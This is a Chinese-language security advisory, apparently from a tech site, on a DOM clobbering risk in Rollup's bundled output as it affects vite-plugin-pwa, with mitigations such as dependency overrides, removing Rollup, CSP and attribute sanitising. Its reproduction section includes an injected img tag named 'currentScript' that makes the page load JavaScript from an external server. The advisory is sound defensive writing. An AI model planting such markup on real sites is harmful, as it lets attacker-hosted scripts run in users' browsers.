首页
/ Vite-plugin-pwa 项目中 Rollup 依赖的 DOM 安全风险分析与解决方案

Vite-plugin-pwa 项目中 Rollup 依赖的 DOM 安全风险分析与解决方案

2025-06-22 21:55:59作者:邓越浪Henry

风险背景

在 vite-plugin-pwa 项目的依赖链中,发现了一个由 Rollup 打包工具引起的 DOM 安全风险。这类问题可能允许攻击者通过精心构造的 HTML 元素(如带有特定 name 属性的 img 标签)来影响 JavaScript 执行流程,最终可能导致安全问题。

技术原理分析

DOM 安全风险是一种特殊的代码重用技术。攻击者通过在网页中嵌入看似无害的非脚本 HTML 标记(如通过评论或帖子),然后利用现有 JavaScript 代码中的"小工具"(gadgets)将其转化为可执行代码。

在 Rollup 的具体实现中,当使用 cjs/umd/iife 格式打包包含 import.meta.url 的脚本时,Rollup 会尝试从 document.currentScript 获取 URL。然而,这个查找过程可能被利用通过浏览器的命名 DOM 树元素访问机制所影响。

风险影响

该问题会影响满足以下条件的网站:

  1. 使用了 Rollup 打包的文件(配置为 cjs/iife/umd 输出格式)
  2. 使用了 import.meta 相关功能
  3. 允许用户注入某些无脚本的 HTML 标签
  4. 未对 name 或 id 属性进行适当清理

问题重现示例

假设开发者使用 Rollup 打包以下脚本:

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

打包后的代码会包含对 document.currentScript 的引用。攻击者只需在页面中插入如下 HTML 元素:

<img name="currentScript" src="https://external.server/"></img>

这将导致浏览器从外部服务器加载额外的 JavaScript 文件,从而引发安全问题。

解决方案

临时解决方案

对于需要立即修复的项目,可以通过以下方式临时解决:

  1. 使用包管理器的覆盖功能强制使用安全版本:

    • 在 package.json 中添加:
      "overrides": {
        "rollup": ">=4.22.4"
      }
      
    • 或者使用 resolutions (yarn) / pnpm.overrides
  2. 直接使用修复后的 PR 版本:

    pnpm add -D vite-plugin-pwa@https://pkg.pr.new/vite-plugin-pwa@759
    

长期解决方案

vite-plugin-pwa 项目团队已经准备了一个移除 Rollup 依赖的 PR,从根本上解决了这个问题。该方案:

  1. 移除了 Rollup 开发依赖
  2. 仅保留必要的类型定义
  3. 使用 Vite 重新导出的 Rollup 类型

需要注意的是,这个解决方案将不再支持 Vite 3,仅支持 Vite 4 及以上版本。

最佳实践建议

  1. 定期检查项目依赖的安全问题
  2. 对于关键依赖,考虑使用包锁定功能
  3. 在允许用户输入 HTML 的场景下,严格过滤 name 和 id 属性
  4. 考虑使用 CSP 等安全策略限制脚本加载来源

总结

DOM 安全风险虽然不常见,但需要重视。通过理解其原理和解决方案,开发者可以更好地保护自己的应用安全。vite-plugin-pwa 项目团队快速响应并提供了多种解决方案,展示了开源社区在安全问题上的高效协作。

登录后查看全文
热门项目推荐
相关项目推荐